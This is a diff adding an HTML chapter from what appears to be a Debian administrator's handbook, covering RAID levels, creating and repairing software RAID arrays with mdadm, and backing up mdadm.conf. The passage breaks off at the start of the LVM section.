+            href="sect.virtualization.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="advanced-administration"></a>Kapitola 12. Advanced Administration</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="advanced-administration.html#sect.raid-and-lvm">12.1. RAID and LVM</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.raid-soft">12.1.1. Software RAID</a></span></dt><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.lvm">12.1.2. LVM</a></span></dt><dt><span
+                    class="section"><a
+                      href="advanced-administration.html#sect.raid-or-lvm">12.1.3. RAID or LVM?</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.virtualization.html">12.2. Virtualization</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html#sect.xen">12.2.1. Xen</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html#sect.lxc">12.2.2. LXC</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtualization.html#id-1.15.5.14">12.2.3. Virtualization with KVM</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.automated-installation.html">12.3. Automated Installation</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html#sect.fai">12.3.1. Fully Automatic Installer (FAI)</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html#sect.d-i-preseeding">12.3.2. Preseeding Debian-Installer</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automated-installation.html#sect.simple-cdd">12.3.3. Simple-CDD: The All-In-One Solution</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.monitoring.html">12.4. Monitoring</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.monitoring.html#sect.munin">12.4.1. Setting Up Munin</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.monitoring.html#sect.nagios">12.4.2. Setting Up Nagios</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		This chapter revisits some aspects we already described, with a different perspective: instead of installing one single computer, we will study mass-deployment systems; instead of creating RAID or LVM volumes at install time, we'll learn to do it by hand so we can later revise our initial choices. Finally, we will discuss monitoring tools and virtualization techniques. As a consequence, this chapter is more particularly targeting professional administrators, and focuses somewhat less on individuals responsible for their home network.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.raid-and-lvm"></a>12.1. RAID and LVM</h2></div></div></div><div
+            class="para">
+			<a
+              class="xref"
+              href="installation.html">4 – „<em>Installation</em>“</a> presented these technologies from the point of view of the installer, and how it integrated them to make their deployment easy from the start. After the initial installation, an administrator must be able to handle evolving storage space needs without having to resort to an expensive reinstallation. They must therefore understand the required tools for manipulating RAID and LVM volumes.
+		</div><div
+            class="para">
+			RAID and LVM are both techniques to abstract the mounted volumes from their physical counterparts (actual hard-disk drives or partitions thereof); the former secures the data against hardware failure by introducing redundancy, the latter makes volume management more flexible and independent of the actual size of the underlying disks. In both cases, the system ends up with new block devices, which can be used to create filesystems or swap space, without necessarily having them mapped to one physical disk. RAID and LVM come from quite different backgrounds, but their functionality can overlap somewhat, which is why they are often mentioned together.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>PERSPECTIVE</em></span> Btrfs combines LVM and RAID</strong></p></div></div></div><div
+              class="para">
+			While LVM and RAID are two distinct kernel subsystems that come between the disk block devices and their filesystems, <span
+                class="emphasis"><em>btrfs</em></span> is a new filesystem, initially developed at Oracle, that purports to combine the featuresets of LVM and RAID and much more. It is mostly functional, and although it is still tagged “experimental” because its development is incomplete (some features aren't implemented yet), it has already seen some use in production environments. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://btrfs.wiki.kernel.org/">http://btrfs.wiki.kernel.org/</a></div>
+		</div><div
+              class="para">
+			Among the noteworthy features are the ability to take a snapshot of a filesystem tree at any point in time. This snapshot copy doesn't initially use any disk space, the data only being duplicated when one of the copies is modified. The filesystem also handles transparent compression of files, and checksums ensure the integrity of all stored data.
+		</div></div><div
+            class="para">
+			In both the RAID and LVM cases, the kernel provides a block device file, similar to the ones corresponding to a hard disk drive or a partition. When an application, or another part of the kernel, requires access to a block of such a device, the appropriate subsystem routes the block to the relevant physical layer. Depending on the configuration, this block can be stored on one or several physical disks, and its physical location may not be directly correlated to the location of the block in the logical device.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.raid-soft"></a>12.1.1. Software RAID</h3></div></div></div><a
+              id="id-1.15.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+				RAID means <span
+                class="emphasis"><em>Redundant Array of Independent Disks</em></span>. The goal of this system is to prevent data loss in case of hard disk failure. The general principle is quite simple: data are stored on several physical disks instead of only one, with a configurable level of redundancy. Depending on this amount of redundancy, and even in the event of an unexpected disk failure, data can be losslessly reconstructed from the remaining disks.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> <span
+                          class="foreignphrase"><em
+                            class="foreignphrase">Independent</em></span> or <span
+                          class="foreignphrase"><em
+                            class="foreignphrase">inexpensive</em></span>?</strong></p></div></div></div><div
+                class="para">
+				The I in RAID initially stood for <span
+                  class="emphasis"><em>inexpensive</em></span>, because RAID allowed a drastic increase in data safety without requiring investing in expensive high-end disks. Probably due to image concerns, however, it is now more customarily considered to stand for <span
+                  class="emphasis"><em>independent</em></span>, which doesn't have the unsavory flavour of cheapness.
+			</div></div><div
+              class="para">
+				RAID can be implemented either by dedicated hardware (RAID modules integrated into SCSI or SATA controller cards) or by software abstraction (the kernel). Whether hardware or software, a RAID system with enough redundancy can transparently stay operational when a disk fails; the upper layers of the stack (applications) can even keep accessing the data in spite of the failure. Of course, this “degraded mode” can have an impact on performance, and redundancy is reduced, so a further disk failure can lead to data loss. In practice, therefore, one will strive to only stay in this degraded mode for as long as it takes to replace the failed disk. Once the new disk is in place, the RAID system can reconstruct the required data so as to return to a safe mode. The applications won't notice anything, apart from potentially reduced access speed, while the array is in degraded mode or during the reconstruction phase.
+			</div><div
+              class="para">
+				When RAID is implemented by hardware, its configuration generally happens within the BIOS setup tool, and the kernel will consider a RAID array as a single disk, which will work as a standard physical disk, although the device name may be different (depending on the driver).
+			</div><div
+              class="para">
+				We only focus on software RAID in this book.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.raid-levels"></a>12.1.1.1. Different RAID Levels</h4></div></div></div><div
+                class="para">
+					RAID is actually not a single system, but a range of systems identified by their levels; the levels differ by their layout and the amount of redundancy they provide. The more redundant, the more failure-proof, since the system will be able to keep working with more failed disks. The counterpart is that the usable space shrinks for a given set of disks; seen the other way, more disks will be needed to store a given amount of data.
+				</div><div
+                class="variablelist"><dl
+                  class="variablelist"><dt><span
+                      class="term">Linear RAID</span></dt><dd><div
+                      class="para">
+								Even though the kernel's RAID subsystem allows creating “linear RAID”, this is not proper RAID, since this setup doesn't involve any redundancy. The kernel merely aggregates several disks end-to-end and provides the resulting aggregated volume as one virtual disk (one block device). That's about its only function. This setup is rarely used by itself (see later for the exceptions), especially since the lack of redundancy means that one disk failing makes the whole aggregate, and therefore all the data, unavailable.
+							</div></dd><dt><span
+                      class="term">RAID-0</span></dt><dd><div
+                      class="para">
+								This level doesn't provide any redundancy either, but disks aren't simply stuck on end one after another: they are divided in <span
+                        class="emphasis"><em>stripes</em></span>, and the blocks on the virtual device are stored on stripes on alternating physical disks. In a two-disk RAID-0 setup, for instance, even-numbered blocks of the virtual device will be stored on the first physical disk, while odd-numbered blocks will end up on the second physical disk.
+							</div><div
+                      class="para">
+								This system doesn't aim at increasing reliability, since (as in the linear case) the availability of all the data is jeopardized as soon as one disk fails, but at increasing performance: during sequential access to large amounts of contiguous data, the kernel will be able to read from both disks (or write to them) in parallel, which increases the data transfer rate. However, RAID-0 use is shrinking, its niche being filled by LVM (see later).
+							</div></dd><dt><span
+                      class="term">RAID-1</span></dt><dd><div
+                      class="para">
+								This level, also known as “RAID mirroring”, is both the simplest and the most widely used setup. In its standard form, it uses two physical disks of the same size, and provides a logical volume of the same size again. Data are stored identically on both disks, hence the “mirror” nickname. When one disk fails, the data is still available on the other. For really critical data, RAID-1 can of course be set up on more than two disks, with a direct impact on the ratio of hardware cost versus available payload space.
+							</div><div
+                      class="sidebar"><div
+                        class="titlepage"><div><div><p
+                              class="title"><strong><span
+                                  class="emphasis"><em>NOTE</em></span> Disks and cluster sizes</strong></p></div></div></div><div
+                        class="para">
+								If two disks of different sizes are set up in a mirror, the bigger one will not be fully used, since it will contain the same data as the smallest one and nothing more. The useful available space provided by a RAID-1 volume therefore matches the size of the smallest disk in the array. This still holds for RAID volumes with a higher RAID level, even though redundancy is stored differently.
+							</div><div
+                        class="para">
+								It is therefore important, when setting up RAID arrays (except for RAID-0 and “linear RAID”), to only assemble disks of identical, or very close, sizes, to avoid wasting resources.
+							</div></div><div
+                      class="sidebar"><div
+                        class="titlepage"><div><div><p
+                              class="title"><strong><span
+                                  class="emphasis"><em>NOTE</em></span> Spare disks</strong></p></div></div></div><div
+                        class="para">
+								RAID levels that include redundancy allow assigning more disks than required to an array. The extra disks are used as spares when one of the main disks fails. For instance, in a mirror of two disks plus one spare, if one of the first two disks fails, the kernel will automatically (and immediately) reconstruct the mirror using the spare disk, so that redundancy stays assured after the reconstruction time. This can be used as another kind of safeguard for critical data.
+							</div><div
+                        class="para">
+								One would be forgiven for wondering how this is better than simply mirroring on three disks to start with. The advantage of the “spare disk” configuration is that the spare disk can be shared across several RAID volumes. For instance, one can have three mirrored volumes, with redundancy assured even in the event of one disk failure, with only seven disks (three pairs, plus one shared spare), instead of the nine disks that would be required by three triplets.
+							</div></div><div
+                      class="para">
+								This RAID level, although expensive (since only half of the physical storage space, at best, is useful), is widely used in practice. It is simple to understand, and it allows very simple backups: since both disks have identical contents, one of them can be temporarily extracted with no impact on the working system. Read performance is often increased since the kernel can read half of the data on each disk in parallel, while write performance isn't too severely degraded. In case of a RAID-1 array of N disks, the data stays available even with N-1 disk failures.
+							</div></dd><dt><span
+                      class="term">RAID-4</span></dt><dd><div
+                      class="para">
+								This RAID level, not widely used, uses N disks to store useful data, and an extra disk to store redundancy information. If that disk fails, the system can reconstruct its contents from the other N. If one of the N data disks fails, the remaining N-1 combined with the “parity” disk contain enough information to reconstruct the required data.
+							</div><div
+                      class="para">
+								RAID-4 isn't too expensive since it only involves a one-in-N increase in costs and has no noticeable impact on read performance, but writes are slowed down. Furthermore, since a write to any of the N disks also involves a write to the parity disk, the latter sees many more writes than the former, and its lifespan can shorten dramatically as a consequence. Data on a RAID-4 array is safe only up to one failed disk (of the N+1).
+							</div></dd><dt><span
+                      class="term">RAID-5</span></dt><dd><div
+                      class="para">
+								RAID-5 addresses the asymmetry issue of RAID-4: parity blocks are spread over all of the N+1 disks, with no single disk having a particular role.
+							</div><div
+                      class="para">
+								Read and write performance are identical to RAID-4. Here again, the system stays functional with up to one failed disk (of the N+1), but no more.
+							</div></dd><dt><span
+                      class="term">RAID-6</span></dt><dd><div
+                      class="para">
+								RAID-6 can be considered an extension of RAID-5, where each series of N blocks involves two redundancy blocks, and each such series of N+2 blocks is spread over N+2 disks.
+							</div><div
+                      class="para">
+								This RAID level is slightly more expensive than the previous two, but it brings some extra safety since up to two drives (of the N+2) can fail without compromising data availability. The counterpart is that write operations now involve writing one data block and two redundancy blocks, which makes them even slower.
+							</div></dd><dt><span
+                      class="term">RAID-1+0</span></dt><dd><div
+                      class="para">
+								This isn't strictly speaking, a RAID level, but a stacking of two RAID groupings. Starting from 2×N disks, one first sets them up by pairs into N RAID-1 volumes; these N volumes are then aggregated into one, either by “linear RAID” or (increasingly) by LVM. This last case goes farther than pure RAID, but there's no problem with that.
+							</div><div
+                      class="para">
+								RAID-1+0 can survive multiple disk failures: up to N in the 2×N array described above, provided that at least one disk keeps working in each of the RAID-1 pairs.
+							</div><div
+                      class="sidebar"><a
+                        xmlns=""
+                        id="sidebar.raid-10"></a><div
+                        class="titlepage"><div><div><p
+                              class="title"><strong><span
+                                  class="emphasis"><em>GOING FURTHER</em></span> RAID-10</strong></p></div></div></div><div
+                        class="para">
+								RAID-10 is generally considered a synonym of RAID-1+0, but a Linux specificity makes it actually a generalization. This setup allows a system where each block is stored on two different disks, even with an odd number of disks, the copies being spread out along a configurable model.
+							</div><div
+                        class="para">
+								Performances will vary depending on the chosen repartition model and redundancy level, and of the workload of the logical volume.
+							</div></div></dd></dl></div><div
+                class="para">
+					Obviously, the RAID level will be chosen according to the constraints and requirements of each application. Note that a single computer can have several distinct RAID arrays with different configurations.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.raid-setup"></a>12.1.1.2. Setting up RAID</h4></div></div></div><a
+                id="id-1.15.4.6.9.2"
+                class="indexterm"></a><div
+                class="para">
+					Setting up RAID volumes requires the <span
+                  class="pkg pkg">mdadm</span> package; it provides the <code
+                  class="command">mdadm</code> command, which allows creating and manipulating RAID arrays, as well as scripts and tools integrating it to the rest of the system, including the monitoring system.
+				</div><div
+                class="para">
+					Our example will be a server with a number of disks, some of which are already used, the rest being available to setup RAID. We initially have the following disks and partitions:
+				</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+							the <code
+                        class="filename">sdb</code> disk, 4 GB, is entirely available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							the <code
+                        class="filename">sdc</code> disk, 4 GB, is also entirely available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							on the <code
+                        class="filename">sdd</code> disk, only partition <code
+                        class="filename">sdd2</code> (about 4 GB) is available;
+						</div></li><li
+                    class="listitem"><div
+                      class="para">
+							finally, a <code
+                        class="filename">sde</code> disk, still 4 GB, entirely available.
+						</div></li></ul></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>NOTE</em></span> Identifying existing RAID volumes</strong></p></div></div></div><div
+                  class="para">
+					The <code
+                    class="filename">/proc/mdstat</code> file lists existing volumes and their states. When creating a new RAID volume, care should be taken not to name it the same as an existing volume.
+				</div></div><div
+                class="para">
+					We're going to use these physical elements to build two volumes, one RAID-0 and one mirror (RAID-1). Let's start with the RAID-0 volume:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm --create /dev/md0 --level=0 --raid-devices=2 /dev/sdb /dev/sdc</code></strong>
+<code
+                  class="computeroutput">mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md0 started.
+# </code><strong
+                  class="userinput"><code>mdadm --query /dev/md0</code></strong>
+<code
+                  class="computeroutput">/dev/md0: 8.00GiB raid0 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md0</code></strong>
+<code
+                  class="computeroutput">/dev/md0:
+        Version : 1.2
+  Creation Time : Wed May  6 09:24:34 2015
+     Raid Level : raid0
+     Array Size : 8387584 (8.00 GiB 8.59 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:24:34 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+     Chunk Size : 512K
+
+           Name : mirwiz:0  (local to host mirwiz)
+           UUID : bb085b35:28e821bd:20d697c9:650152bb
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       16        0      active sync   /dev/sdb
+       1       8       32        1      active sync   /dev/sdc
+# </code><strong
+                  class="userinput"><code>mkfs.ext4 /dev/md0</code></strong>
+<code
+                  class="computeroutput">mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 2095104 4k blocks and 524288 inodes
+Filesystem UUID: fff08295-bede-41a9-9c6a-8c7580e520a6
+Superblock backups stored on blocks: 
+        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
+
+Allocating group tables: done                            
+Writing inode tables: done                            
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </code><strong
+                  class="userinput"><code>mkdir /srv/raid-0</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mount /dev/md0 /srv/raid-0</code></strong>
+<code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>df -h /srv/raid-0</code></strong>
+<code
+                  class="computeroutput">Filesystem      Size  Used Avail Use% Mounted on
+/dev/md0        7.9G   18M  7.4G   1% /srv/raid-0
+</code></pre><div
+                class="para">
+					The <code
+                  class="command">mdadm --create</code> command requires several parameters: the name of the volume to create (<code
+                  class="filename">/dev/md*</code>, with MD standing for <span
+                  class="foreignphrase"><em
+                    class="foreignphrase">Multiple Device</em></span>), the RAID level, the number of disks (which is compulsory despite being mostly meaningful only with RAID-1 and above), and the physical drives to use. Once the device is created, we can use it like we'd use a normal partition, create a filesystem on it, mount that filesystem, and so on. Note that our creation of a RAID-0 volume on <code
+                  class="filename">md0</code> is nothing but coincidence, and the numbering of the array doesn't need to be correlated to the chosen amount of redundancy. It's also possible to create named RAID arrays, by giving <code
+                  class="command">mdadm</code> parameters such as <code
+                  class="filename">/dev/md/linear</code> instead of <code
+                  class="filename">/dev/md0</code>.
+				</div><div
+                class="para">
+					Creation of a RAID-1 follows a similar fashion, the differences only being noticeable after the creation:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm --create /dev/md1 --level=1 --raid-devices=2 /dev/sdd2 /dev/sde</code></strong>
+<code
+                  class="computeroutput">mdadm: Note: this array has metadata at the start and
+    may not be suitable as a boot device.  If you plan to
+    store '/boot' on this device please ensure that
+    your boot-loader understands md/v1.x metadata, or use
+    --metadata=0.90
+mdadm: largest drive (/dev/sdd2) exceeds size (4192192K) by more than 1%
+Continue creating array? </code><strong
+                  class="userinput"><code>y</code></strong>
+<code
+                  class="computeroutput">mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md1 started.
+# </code><strong
+                  class="userinput"><code>mdadm --query /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1: 4.00GiB raid1 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+        Version : 1.2
+  Creation Time : Wed May  6 09:30:19 2015
+     Raid Level : raid1
+     Array Size : 4192192 (4.00 GiB 4.29 GB)
+  Used Dev Size : 4192192 (4.00 GiB 4.29 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:30:40 2015
+          State : clean, resyncing (PENDING) 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       1       8       64        1      active sync   /dev/sde
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+          State : clean
+[...]
+</code></pre><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> RAID, disks and partitions</strong></p></div></div></div><div
+                  class="para">
+					As illustrated by our example, RAID devices can be constructed out of disk partitions, and do not require full disks.
+				</div></div><div
+                class="para">
+					A few remarks are in order. First, <code
+                  class="command">mdadm</code> notices that the physical elements have different sizes; since this implies that some space will be lost on the bigger element, a confirmation is required.
+				</div><div
+                class="para">
+					More importantly, note the state of the mirror. The normal state of a RAID mirror is that both disks have exactly the same contents. However, nothing guarantees this is the case when the volume is first created. The RAID subsystem will therefore provide that guarantee itself, and there will be a synchronization phase as soon as the RAID device is created. After some time (the exact amount will depend on the actual size of the disks…), the RAID array switches to the “active” or “clean” state. Note that during this reconstruction phase, the mirror is in a degraded mode, and redundancy isn't assured. A disk failing during that risk window could lead to losing all the data. Large amounts of critical data, however, are rarely stored on a freshly created RAID array before its initial synchronization. Note that even in degraded mode, the <code
+                  class="filename">/dev/md1</code> is usable, and a filesystem can be created on it, as well as some data copied on it.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> Starting a mirror in degraded mode</strong></p></div></div></div><div
+                  class="para">
+					Sometimes two disks are not immediately available when one wants to start a RAID-1 mirror, for instance because one of the disks one plans to include is already used to store the data one wants to move to the array. In such circumstances, it is possible to deliberately create a degraded RAID-1 array by passing <code
+                    class="filename">missing</code> instead of a device file as one of the arguments to <code
+                    class="command">mdadm</code>. Once the data have been copied to the “mirror”, the old disk can be added to the array. A synchronization will then take place, giving us the redundancy that was wanted in the first place.
+				</div></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> Setting up a mirror without synchronization</strong></p></div></div></div><div
+                  class="para">
+					RAID-1 volumes are often created to be used as a new disk, often considered blank. The actual initial contents of the disk is therefore not very relevant, since one only needs to know that the data written after the creation of the volume, in particular the filesystem, can be accessed later.
+				</div><div
+                  class="para">
+					One might therefore wonder about the point of synchronizing both disks at creation time. Why care whether the contents are identical on zones of the volume that we know will only be read after we have written to them?
+				</div><div
+                  class="para">
+					Fortunately, this synchronization phase can be avoided by passing the <code
+                    class="literal">--assume-clean</code> option to <code
+                    class="command">mdadm</code>. However, this option can lead to surprises in cases where the initial data will be read (for instance if a filesystem is already present on the physical disks), which is why it isn't enabled by default.
+				</div></div><div
+                class="para">
+					Now let's see what happens when one of the elements of the RAID-1 array fails. <code
+                  class="command">mdadm</code>, in particular its <code
+                  class="literal">--fail</code> option, allows simulating such a disk failure:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm /dev/md1 --fail /dev/sde</code></strong>
+<code
+                  class="computeroutput">mdadm: set /dev/sde faulty in /dev/md1
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+    Update Time : Wed May  6 09:39:39 2015
+          State : clean, degraded 
+ Active Devices : 1
+Working Devices : 1
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 19
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       0        0        2      removed
+
+       1       8       64        -      faulty   /dev/sde</code></pre><div
+                class="para">
+					The contents of the volume are still accessible (and, if it is mounted, the applications don't notice a thing), but the data safety isn't assured anymore: should the <code
+                  class="filename">sdd</code> disk fail in turn, the data would be lost. We want to avoid that risk, so we'll replace the failed disk with a new one, <code
+                  class="filename">sdf</code>:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm /dev/md1 --add /dev/sdf</code></strong>
+<code
+                  class="computeroutput">mdadm: added /dev/sdf
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+   Raid Devices : 2
+  Total Devices : 3
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:48:49 2015
+          State : clean, degraded, recovering 
+ Active Devices : 1
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 1
+
+ Rebuild Status : 28% complete
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 26
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      spare rebuilding   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde
+# </code><strong
+                  class="userinput"><code>[...]</code></strong>
+<code
+                  class="computeroutput">[...]
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+    Update Time : Wed May  6 09:49:08 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 41
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde</code></pre><div
+                class="para">
+					Here again, the kernel automatically triggers a reconstruction phase during which the volume, although still accessible, is in a degraded mode. Once the reconstruction is over, the RAID array is back to a normal state. One can then tell the system that the <code
+                  class="filename">sde</code> disk is about to be removed from the array, so as to end up with a classical RAID mirror on two disks:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm /dev/md1 --remove /dev/sde</code></strong>
+<code
+                  class="computeroutput">mdadm: hot removed /dev/sde from /dev/md1
+# </code><strong
+                  class="userinput"><code>mdadm --detail /dev/md1</code></strong>
+<code
+                  class="computeroutput">/dev/md1:
+[...]
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf</code></pre><div
+                class="para">
+					From then on, the drive can be physically removed when the server is next switched off, or even hot-removed when the hardware configuration allows hot-swap. Such configurations include some SCSI controllers, most SATA disks, and external drives operating on USB or Firewire.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.backup-raid-config"></a>12.1.1.3. Backing up the Configuration</h4></div></div></div><div
+                class="para">
+					Most of the meta-data concerning RAID volumes are saved directly on the disks that make up these arrays, so that the kernel can detect the arrays and their components and assemble them automatically when the system starts up. However, backing up this configuration is encouraged, because this detection isn't fail-proof, and it is only expected that it will fail precisely in sensitive circumstances. In our example, if the <code
+                  class="filename">sde</code> disk failure had been real (instead of simulated) and the system had been restarted without removing this <code
+                  class="filename">sde</code> disk, this disk could start working again due to having been probed during the reboot. The kernel would then have three physical elements, each claiming to contain half of the same RAID volume. Another source of confusion can come when RAID volumes from two servers are consolidated onto one server only. If these arrays were running normally before the disks were moved, the kernel would be able to detect and reassemble the pairs properly; but if the moved disks had been aggregated into an <code
+                  class="filename">md1</code> on the old server, and the new server already has an <code
+                  class="filename">md1</code>, one of the mirrors would be renamed.
+				</div><div
+                class="para">
+					Backing up the configuration is therefore important, if only for reference. The standard way to do it is by editing the <code
+                  class="filename">/etc/mdadm/mdadm.conf</code> file, an example of which is listed here:
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="example.mdadm-conf"></a><p
+                  class="title"><strong>Příklad 12.1. <code
+                      class="command">mdadm</code> configuration file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting"># mdadm.conf
+#
+# Please refer to mdadm.conf(5) for information about this file.
+#
+
+# by default (built-in), scan all partitions (/proc/partitions) and all
+# containers for MD superblocks. alternatively, specify devices to scan, using
+# wildcards if desired.
+DEVICE /dev/sd*
+
+# auto-create devices with Debian standard permissions
+CREATE owner=root group=disk mode=0660 auto=yes
+
+# automatically tag new arrays as belonging to the local system
+HOMEHOST &lt;system&gt;
+
+# instruct the monitoring daemon where to send mail alerts
+MAILADDR root
+
+# definitions of existing MD arrays
+ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464
+
+# This configuration was auto-generated on Thu, 17 Jan 2013 16:21:01 +0100
+# by mkconf 3.2.5-3
+</pre></div></div><div
+                class="para">
+					One of the most useful details is the <code
+                  class="literal">DEVICE</code> option, which lists the devices where the system will automatically look for components of RAID volumes at start-up time. In our example, we replaced the default value, <code
+                  class="literal">partitions containers</code>, with an explicit list of device files, since we chose to use entire disks and not only partitions, for some volumes.
+				</div><div
+                class="para">
+					The last two lines in our example are those allowing the kernel to safely pick which volume number to assign to which array. The metadata stored on the disks themselves are enough to re-assemble the volumes, but not to determine the volume number (and the matching <code
+                  class="filename">/dev/md*</code> device name).
+				</div><div
+                class="para">
+					Fortunately, these lines can be generated automatically:
+				</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mdadm --misc --detail --brief /dev/md?</code></strong>
+<code
+                  class="computeroutput">ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464</code></pre><div
+                class="para">
+					The contents of these last two lines doesn't depend on the list of disks included in the volume. It is therefore not necessary to regenerate these lines when replacing a failed disk with a new one. On the other hand, care must be taken to update the file when creating or deleting a RAID array.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.lvm"></a>12.1.2. LVM</h3></div></div></div><a
